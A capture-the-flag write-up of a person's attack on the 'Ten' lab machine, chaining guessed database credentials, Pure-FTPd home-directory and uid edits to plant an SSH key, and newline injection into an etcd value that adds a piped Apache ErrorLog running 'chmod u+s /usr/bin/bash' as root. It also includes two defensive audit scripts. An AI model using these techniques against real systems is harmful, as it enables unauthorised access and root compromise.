Here are my notes on the TEN box from Vulnlab, which was later deployed to HackTheBox.
TEN: 10.10.105.224
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
220-This is a private system - No anonymous login
#NOPE
#From the HTTP service on port 80, signup.php:
OK
Your personal account is ready to be used:
Username: ten-318b34f7
Password: a3fd45a7
Personal Domain: test.ten.vl
You can use the provided credentials to upload your pages
via ftp://ten.vl.
Log in to FTP as ten-318b34f7; we can upload files there as usual.
We still have to find a way to reach the uploaded file through the web server.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful
150 Connecting to port 36623
100% |**************************************************************************************************************| 6 1.50 KiB/s 00:00 ETA
226-File successfully transferred
226 0.269 seconds (measured here), 22.28 bytes per second
6 bytes sent in 00:00 (0.01 KiB/s)
ftp> ls -lah
200 PORT command successful
150 Connecting to port 57125
drwxr-xr-x 2 9084 9084 4096 Dec 7 16:07 .
drwxr-xr-x 2 9084 9084 4096 Dec 7 16:07 ..
-rw-r--r-- 1 9084 9084 6 Dec 7 16:07 test.txt
#After modifying the dir column in WebDB.
ftp> cd /
250 OK. Current directory is /
ftp> ls
229 Extended Passive mode OK (|||29510|)
150 Accepted data connection
lrwxrwxrwx 1 0 root 7 Feb 16 2024 bin -> usr/bin
drwxr-xr-x 4 0 root 4096 Sep 28 10:23 boot
dr-xr-xr-x 2 0 root 4096 Feb 16 2024 cdrom
[SNIP]
250 OK. Current directory is /home
ftp> ls
229 Extended Passive mode OK (|||42279|)
150 Accepted data connection
drwxr-x--- 4 1000 tyrell 4096 Sep 28 14:48 tyrell
Go back to WebDB and set the uid and gid to 1000 to access tyrell's home directory.
ftp> pwd
Remote directory: /home/tyrell
ftp> ls -lah
229 Extended Passive mode OK (|||15084|)
150 Accepted data connection
drwxr-x--- 4 1000 tyrell 4096 Sep 28 14:48 .
drwxr-xr-x 3 0 root 4096 Sep 28 08:51 ..
lrwxrwxrwx 1 1000 tyrell 9 Sep 28 10:21 .bash_history -> /dev/null
-rw-r--r-- 1 1000 tyrell 220 Jan 6 2022 .bash_logout
-rw-r--r-- 1 1000 tyrell 3771 Jan 6 2022 .bashrc
drwx------ 2 1000 tyrell 4096 Sep 28 10:16 .cache
-rw-r--r-- 1 1000 tyrell 807 Jan 6 2022 .profile
drwx------ 2 1000 tyrell 4096 Sep 28 10:16 .ssh
-r-------- 1 1000 tyrell 37 Sep 28 10:20 .user.txt
226-Options: -a -l
226 9 matches total
ftp> cd .ssh
553 Prohibited file name: .ssh
Go back to WebDB and change the dir column to /srv/../home/tyrell/.ssh.
Pure-FTPd prohibits entering .ssh by name, so to bypass this we change the FTP user's home path to something like /srv/../home/the_user/.ssh.
ftp> pwd
Remote directory: /home/tyrell/.ssh
ftp> ls -lah
229 Extended Passive mode OK (|||11498|)
150 Accepted data connection
drwx------ 2 1000 tyrell 4096 Sep 28 10:16 .
drwxr-x--- 4 1000 tyrell 4096 Sep 28 14:48 ..
-rw------- 1 1000 tyrell 162 Sep 28 10:16 authorized_keys
Now generate an id_rsa key pair as usual and use it to gain a shell.
ssh -i id_rsa tyrell@10.10.105.224
Last login: Sat Dec 7 16:47:42 2024 from 10.8.0.71
tyrell@ten:~$ whoami
tyrell
tyrell@ten:~$ hostname
ten
USER-SHELL !
tyrell@ten:~$ whoami
tyrell
tyrell@ten:~$ hostname
ten
tyrell@ten:~$ cat .user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 13985452d37bae326a336f18a35a2766 (ECDSA)
|_ 256 2ed58625c16b0e51a22add8244a60063 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Page moved.
info.php is just phpinfo.
info.php?file= does nothing useful - NOPE.
No RFI via info.php - BIG NOPE !
No LFI either - NOPE !
signup.php: creates the FTP account (output shown above).
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://ten.vl/ -H "Host: FUZZ.ten.vl" --fs 205
webdb [Status: 200, Size: 1685, Words: 55, Lines: 14, Duration: 922ms]
webdb.ten.vl:
Guessed credentials work:
"user": "user",
"password": "pa55w0rd",
WebDB Version 2024.09.28
No known CVE for this version - NOPE.
The pureftpd database contains the credentials of ten-318b34f7, as expected.
It seems we can modify the Pure-FTPd user's uid and gid - interesting.
Default:
ten-318b34f7 - uid 9084, gid 9084.
The Query section lets us run MySQL commands directly.
USE pureftpd;
SHOW TABLES;
SELECT * FROM users;
#Works as normal.
Looking back at FTP:
230 OK. Current directory is /srv/home/ten-318b34f7
It seems we can modify the FTP home path in WebDB, so let's try that out with /srv/home/ten-318b34f7.
Just edit the dir column to /srv/home/ten-318b34f7 and it should work.
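The whole foothold rests on rows in pureftpd.users being editable: the dir value decides the chroot jail (Pure-FTPd treats /./ as the jail marker) and uid/gid decide whose files the FTP process can read. The following audit, an added example that is not part of these notes or the box, resolves each row's effective home and flags rows that escape /srv, lack the jail marker, or use a uid/gid outside the 2000-65535 range the signup script assigns; the sample rows are constructed from the values in these notes.

```python
import posixpath

# Constructed rows shaped like the pureftpd.users table seen in WebDB:
# (user, uid, gid, dir). Row 0 is the default the signup script writes,
# rows 1 and 2 are the manipulated values from these notes.
SAMPLE_ROWS = [
    ("ten-318b34f7", 9084, 9084, "/srv/ten-318b34f7/./"),
    ("ten-318b34f7", 1000, 1000, "/srv/../home/tyrell/.ssh"),
    ("ten-318b34f7", 9084, 9084, "/srv/home/ten-318b34f7"),
]

FTP_ROOT = "/srv"
MIN_UID, MAX_UID = 2000, 65535   # range used by random_int() in the signup script

def effective_home(directory):
    """Resolve a Pure-FTPd home string to the directory it really exposes.

    Pure-FTPd treats '/./' as the chroot marker: the part before it is the
    jail root. The result is normalised lexically so that '..' components
    which walk out of the FTP root collapse and become visible."""
    jail = directory.split("/./", 1)[0]
    return posixpath.normpath(jail)

def audit_ftp_user(user, uid, gid, directory):
    """Return a list of findings for one pureftpd.users row."""
    findings = []
    home = effective_home(directory)
    if home != FTP_ROOT and not home.startswith(FTP_ROOT + "/"):
        findings.append(f"{user}: home {directory!r} resolves to {home}, outside {FTP_ROOT}")
    if "/./" not in directory:
        findings.append(f"{user}: no '/./' chroot marker, user is not jailed")
    for name, value in (("uid", uid), ("gid", gid)):
        if not MIN_UID <= value <= MAX_UID:
            findings.append(f"{user}: {name} {value} outside {MIN_UID}-{MAX_UID}")
    return findings

def audit_all(rows):
    """Map row index to its findings, for rows that have any."""
    result = {}
    for i, row in enumerate(rows):
        findings = audit_ftp_user(*row)
        if findings:
            result[i] = findings
    return result

if __name__ == "__main__":
    for i, findings in audit_all(SAMPLE_ROWS).items():
        print(f"row {i}:", *findings, sep="\n  ")
```

Running the same checks as a periodic query against the live table would have caught both of the edits made through WebDB in these notes.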
webdb NOTES:
https://ethicxz.github.io/VL-Ten-Machine/#create-user-and-change-path-and-uid
PRIV ESC: /usr/bin/etcdctl, the vhost .conf template and pspy. Notes:
https://ethicxz.github.io/VL-Ten-Machine/#use-a-config-file-to-be-root
Run pspy64s, then create another FTP account via the signup page on port 80, and you will see this:
pspy64s:
2024/12/07 16:58:08 CMD: UID=33 PID=3294 | sh -c ETCDCTL_API=3 /usr/bin/etcdctl put /customers/ten-966a9fd0/url test2
2024/12/07 16:58:08 CMD: UID=33 PID=3295 | sh -c ETCDCTL_API=3 /usr/bin/etcdctl put /customers/ten-966a9fd0/url test2
tyrell@ten:/var/www/html$ ls
attribution.php carousel.css dist get-credentials-please-do-not-spam-this-thanks.php images.txt index.html index.php info.php signup.php
tyrell@ten:/var/www/html$ cat get-credentials-please-do-not-spam-this-thanks.php
<?php
if ( !isset($_POST['domain']) ) {
    header('Location: /signup.php');
}
if(!preg_match('/^[0-9a-z]+$/', $_POST['domain'])) {
    echo('<font color=red>Domain name can only contain alphanumeric characters.</font>');
} else {
    $username = "ten-" . substr(hash("md5",rand()),0,8);
    $password = substr(hash("md5",rand()),0,8);
    $password_crypt = crypt($password,'$1$OWNhNDE');
    sleep(10); // This is only here so that you do not create too many users :)
    $mysqli = new mysqli("127.0.0.1", "user", "pa55w0rd", "pureftpd");
    $stmt = $mysqli->prepare("INSERT INTO users VALUES ( NULL, ?, ?, ?, ?, ? );");
    $uid = random_int(2000,65535);
    $dir = "/srv/$username/./";
    $stmt->bind_param('ssiis',$username,$password_crypt,$uid,$uid,$dir);
    $stmt->execute();
    system("ETCDCTL_API=3 /usr/bin/etcdctl put /customers/$username/url " . $_POST['domain']);
    echo('<p class="lead">Your personal account is ready to be used:<br><br>Username: <b>'.$username.'</b><br>Password: <b>'.$password.'</b><br>Personal Domain: <b>'.$_POST['domain'].'.ten.vl</b><br><br>You can use the provided credentials to upload your pages<br> via ftp://ten.vl.<br><br><font size="-1">It may take up to one minute for all backend processes to properly identify you as well as your personal virtual host to be available.</font></p>');
}
tyrell@ten:/etc/remco$ pwd
/etc/remco
tyrell@ten:/etc/remco$ cat config
log_level = "info"
log_format = "text"

[[resource]]
  name = "apache2"

  [[resource.template]]
    src = "/etc/remco/templates/010-customers.conf.tmpl"
    dst = "/etc/apache2/sites-enabled/010-customers.conf"
    reload_cmd = "systemctl restart apache2.service"

  [resource.backend]
    [resource.backend.etcd]
      version = 3
      nodes = ["http://127.0.0.1:2379"]
      keys = ["/customers"]
      watch = true
      interval = 5
tyrell@ten:/etc/remco$ cat /etc/apache2/sites-enabled/010-customers.conf
<VirtualHost *:80>
ServerName test.ten.vl
DocumentRoot /srv/ten-318b34f7/
</VirtualHost>
<VirtualHost *:80>
ServerName test2.ten.vl
DocumentRoot /srv/ten-966a9fd0/
</VirtualHost>
So let's experiment with this:
ETCDCTL_API=3 /usr/bin/etcdctl put /customers/ten-966a9fd0/url test3
tyrell@ten:/etc/remco$ ETCDCTL_API=3 /usr/bin/etcdctl put /customers/ten-966a9fd0/url test3
OK
tyrell@ten:/etc/remco$ cat /etc/apache2/sites-enabled/010-customers.conf
<VirtualHost *:80>
ServerName test.ten.vl
DocumentRoot /srv/ten-318b34f7/
</VirtualHost>
<VirtualHost *:80>
ServerName test3.ten.vl
DocumentRoot /srv/ten-966a9fd0/
</VirtualHost>
Now let's exploit it:
ETCDCTL_API=3 /usr/bin/etcdctl put /customers/ten-b94344ef/url 'fake.ten.vl
ErrorLog "|/usr/bin/chmod u+s /usr/bin/bash"
#'
Alternative:
ETCDCTL_API=3 /usr/bin/etcdctl put /customers/ten-b94344ef/url 'fake.ten.vl
CustomLog "|/usr/bin/chmod u+s /usr/bin/bash" common
#'
tyrell@ten:/etc/remco$ ETCDCTL_API=3 /usr/bin/etcdctl put /customers/ten-b94344ef/url 'fake.ten.vl
ErrorLog "|/usr/bin/chmod u+s /usr/bin/bash"
#'
OK
tyrell@ten:/etc/remco$ cat /etc/apache2/sites-enabled/010-customers.conf
<VirtualHost *:80>
ServerName test.ten.vl
DocumentRoot /srv/ten-318b34f7/
</VirtualHost>
<VirtualHost *:80>
ServerName test3.ten.vl
DocumentRoot /srv/ten-966a9fd0/
</VirtualHost>
<VirtualHost *:80>
ServerName fake.ten.vl
ErrorLog "|/usr/bin/chmod u+s /usr/bin/bash"
#.ten.vl
DocumentRoot /srv/ten-b94344ef/
</VirtualHost>
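The root cause is that the /customers/<user>/url value is rendered into the vhost template unvalidated, so a newline turns one ServerName line into arbitrary directives, and Apache starts piped log programs as root. As an added example (not part of these notes or the box), the code below shows the two defensive checks that break this chain: a strict label validator for the etcd value (using fullmatch, since a `$`-anchored match still accepts a trailing newline, the same property the PCRE pattern in signup.php has) and an audit of the generated file that flags any directive other than ServerName/DocumentRoot or any piped log command. The config text is a constructed copy of the file shown above.

```python
import re

# Constructed copy of the generated vhost file from these notes, including
# the injected block, so the checks run offline.
GENERATED_CONF = """\
<VirtualHost *:80>
    ServerName test.ten.vl
    DocumentRoot /srv/ten-318b34f7/
</VirtualHost>
<VirtualHost *:80>
    ServerName fake.ten.vl
    ErrorLog "|/usr/bin/chmod u+s /usr/bin/bash"
    #.ten.vl
    DocumentRoot /srv/ten-b94344ef/
</VirtualHost>
"""

# A legitimate /customers/<user>/url value is one DNS label. fullmatch is
# used deliberately: with re.match, '$' still accepts a trailing '\n', and a
# newline is exactly what turns one template line into extra directives.
LABEL = re.compile(r"[0-9a-z]{1,63}")

def valid_customer_label(value):
    return LABEL.fullmatch(value) is not None

# The template is only supposed to emit these two directives per vhost.
ALLOWED_DIRECTIVES = {"ServerName", "DocumentRoot"}

def audit_vhost_conf(text):
    """Return (line number, finding) pairs for a generated customer vhost file."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line[0] in "#<":   # blank, comment, or <VirtualHost> tag
            continue
        directive = line.split()[0]
        if directive not in ALLOWED_DIRECTIVES:
            findings.append((lineno, f"unexpected directive {directive}"))
        if '"|' in line:
            # piped log programs are started by Apache's root parent process
            findings.append((lineno, "piped log command"))
    return findings

if __name__ == "__main__":
    for lineno, finding in audit_vhost_conf(GENERATED_CONF):
        print(f"line {lineno}: {finding}")
```

Running the validator before the etcd put, and the audit as a pre-check in remco's reload path, would reject the injected value and refuse to restart apache2 with the modified file.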
tyrell@ten:/etc/remco$ ls -lah /usr/bin/bash
-rwsr-xr-x 1 root root 1.4M Mar 14 2024 /usr/bin/bash
#Wait a few seconds for root to pick up 010-customers.conf (visible in pspy64s); once apache2 restarts, the ErrorLog pipe runs as root and /usr/bin/bash gets the SUID bit.
tyrell@ten:/etc/remco$ ls -lah /usr/bin/bash
-rwsr-xr-x 1 root root 1.4M Mar 14 2024 /usr/bin/bash
tyrell@ten:/etc/remco$ ls -lah /bin/bash
-rwsr-xr-x 1 root root 1.4M Mar 14 2024 /bin/bash
tyrell@ten:/etc/remco$ /bin/bash -p
bash-5.1# whoami
root
bash-5.1# id
uid=1000(tyrell) gid=1000(tyrell) euid=0(root) groups=1000(tyrell)
bash-5.1# hostname
ten
ROOT-SHELL !
bash-5.1# whoami
root
bash-5.1# hostname
ten
bash-5.1# cat root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel